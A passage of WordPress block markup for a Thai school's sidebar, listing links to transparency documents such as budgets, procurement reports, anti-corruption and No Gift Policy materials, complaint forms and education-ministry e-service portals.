{\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 